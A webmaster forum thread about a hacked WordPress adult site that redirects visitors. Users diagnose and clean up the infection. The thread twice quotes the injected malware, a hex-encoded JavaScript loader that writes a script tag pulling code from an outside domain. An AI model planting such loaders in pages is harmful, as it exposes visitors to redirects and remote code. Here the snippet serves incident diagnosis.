Redirection issue
 

Hello, I hope someone here will help me. Today I was informed that there is redirection on my biggest site, but of course as usual I don't see anything from my computer and from proxies I tried, so I don't know what causes it. I have advertisement only from companies I always trusted, nastydollar and sextracker moneytree, there is also one trade script and that should be pretty much everything so I don't know where the redirection comes from and how long it hurts my site... Thanks for any help, the site is teen-porn-tube.com

Ok thank you, but I still do not know how to figure out what is causing it from this peice of code, but at least I see it is really truth

If I were to hack a WP site, I would insert js in the header with an exploit, most likely in a template file. Check one of these from your header:

teen-porn-tube.com/wp-content/themes/WPTube3/js/jquery-1.3.2.min.js
teen-porn-tube.com/wp-content/themes/WPTube3/js/jqueryslidemenu/jqueryslidemenu.js

went to your site via google search
after the page loaded I
got redirected here:

http://17.uso2.com/

edit/ now the browser that i left open in the background on your site is constantly bouncing between your page, a redirection page, and the target page (every 3 seconds)
LOL

Also, maybe check wp-content/themes/theme-name/header.php and see if there is anything different there than what you see in your source. Usually malicious redirects are js that look like gibberish


Also, is that last line of js after html tag supposed to be there?..

I don't know any slider I use on my so I just deleted them, but they looked alright, the file had exact size as original and so...

I see some strange piece of code right in the top of header.php so i put it away, is it still redirecting?

It doesn't redirect for me anymore so I hope that fixed your problem :)

Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

That's what I was thinking too but wasn't sure if you put it there or not. Are you using the latest version of WP (3.3) and maybe upgrade your php.

And change your passwords :)

Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>

Whenever you see encoded stuff like that it's usually bad, you can also use a decoder to see what the actually code was. There's a lot of "free" wordpress theme websites that will put stuff like this in the theme. Always go through your header and footer checking for it.

Thats the script under html that I was talking about, thought it was deleted.. My bad

Yeah that injected script has been a problem with Wordpress in the past - but it's really because we're dumbasses and don't update and don't change passwords every now and then.

I don't know what your FTP client is Chezter but it probably uses a simple xml file to cache your log in to your server. Delete that cache or file or just blank the log-in fields out if you don't change your FTP password - it can be during uploads that the injector writes itself into your files/templates, or by accessing your wordpress templates as admin - and it propagates it to every page throughout your site.

To get rid of this one you're going to have to call your hosting tech support and tell them about the exploit. Before you call them, change your FTP password, change your Wordpress Password (change your admin username if you know how, "admin" default is just a security risk too), and let them know that you did.

And don't try to change anything (add a new post, FTP something to the server) until the tech department wipes it out.

When it happened to me I just called the hosting company and tech support had it taken out in a couple thousand pages in less than two minutes.

Oh, and update your version of wordpress.

line 586 index.html

<!-- /wrapper -->



</body>

</html>

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>

It is the same code, just it was not only in header but it is in footerm index, links... everywhere

"Funny" is it is also in other domains on the same ftp account, just everywhere and it is there for 11 months :) that crazy, I would like to how I could never see it in any site...

Ok my hosting support told me they deleted all the bad code from my webs, so I need for the last time to know if the sites is still redirecting or not. Thanks again all of you who helped me with this.

ok...tried it for you again (different box and browser)
it tried to hijack my browser.....i viewed source and this was still at the bottom

check the vision of your FTP program -- is it up to date?
there was a problem like this a while back with old Filezilla apps -- maybe related

I use total commander 7.04 and it is probably not up to date

Reinstalled wordpress, reinstalled template, used new total commander, deleted everything I could so if it still there than I'm really fucked....

I know I'm annoying, but is it still redirecting or not?